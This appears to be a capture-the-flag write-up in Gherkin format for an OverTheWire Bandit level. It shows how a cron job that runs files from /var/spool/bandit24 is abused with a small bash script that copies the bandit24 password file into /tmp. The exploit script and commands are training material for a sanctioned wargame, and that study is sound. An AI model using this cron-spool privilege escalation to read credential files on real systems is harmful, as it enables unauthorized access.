## Version 2.0
## language: en

Feature:
  Site:
    www.overthewire.org
  Category:
    Wargame - CTF
  User:
    34edprado
  Goal:
    Capture the Flag to the next level

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Ubuntu          | 18.04.5 LTS   |
    | Brave           | V1.21.76      |
    | SSH             | OpenSSH_7.6p1 |
  Machine information:
    Given the challenge URL
    """
    https://overthewire.org/wargames/bandit/bandit24.html
    """
    When I open the challenge URL using Brave
    Then I see the text
    """
    A program is running automatically at regular intervals from cron,
    the time-based job scheduler.
    Look in /etc/cron.d/ for the configuration
    and see what command is being executed.
    """
    When I connect to the remote server via SSH
    """
    $ ssh bandit2@176.9.9.172 -p 2220
    """
    Then I take a look at the "/etc/cron.d" directory
    And I see there's a cronjob named "cronjob_bandit24"

  Scenario: Information Gathering
    Given I have information about the cronjob running for user bandit24
    When I take a look at the cronjob using the "cat" command
    """
    @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
    * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
    """
    Then I see the cronjob is executing a script every minute
    When I print the "cronjob_bandit24.sh" script using "cat"
    """
    #!/bin/bash

    myname=$(whoami)

    cd /var/spool/$myname
    echo "Executing and deleting all scripts in /var/spool/$myname:"
    for i in * .*;
    do
        if [ "$i" != "." -a "$i" != ".." ];
        then
            echo "Handling $i"
            owner="$(stat --format "%U" ./$i)"
            if [ "${owner}" = "bandit23" ]; then
                timeout -s 9 60 ./$i
            fi
            rm -f ./$i
        fi
    done
    """
    Then I conclude the key to get the flag is in the "var/spool" directory

  Scenario: Fail: getting the flag in the wrong directory
    Given The information gathered in the previous scenario
    When I take a look at the "var/spool" directory
    And I see a "bandit24" folder
    Then I conclude the scripts in the folder are executed as user "bandit24"
    When I code a small script to print the flag:
    """
    #! /bin/bash

    cat /etc/bandit_pass/bandit24 >> /home/bandit23/flag.txt
    echo "success!" >> /home/bandit23/flag.txt
    """
    And I give the execution permissions using "chmod"
    """
    chmod +x flag.sh
    """
    Then no "flag.txt" file was created in the home directory
    And I could not get the flag

  Scenario: Success: Using the tmp directory
    Given The previous Fail scenario
    When I slightly modify the output directory
    """
    #! /bin/bash

    cat /etc/bandit_pass/bandit24 >> /tmp/flag.txt
    echo "success!" >> /tmp/flag.txt
    """
    And I wait for the cronjob to run using the "watch" command
    """
    $ watch cat /tmp/flag.txt
    """
    Then I get the "flag.txt" file [evidence](success24.png)
    And I capture the flag
